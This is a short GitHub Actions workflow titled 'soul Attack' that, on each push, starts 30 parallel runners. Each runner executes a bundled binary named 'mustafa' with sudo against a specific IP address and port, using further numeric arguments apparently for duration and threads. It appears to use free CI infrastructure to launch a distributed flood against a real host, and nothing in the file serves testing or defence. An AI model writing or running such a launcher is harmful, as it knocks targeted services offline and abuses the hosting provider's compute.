name: soul Attack
on: [push]

jobs:
  network-test:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        worker: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]
    steps:
    - name: Checkout code
      uses: actions/checkout@v3
    - name: Make binary executable  
      run: chmod +x mustafa
    - run: sudo ./mustafa 20.235.51.68 12396 60 51 999
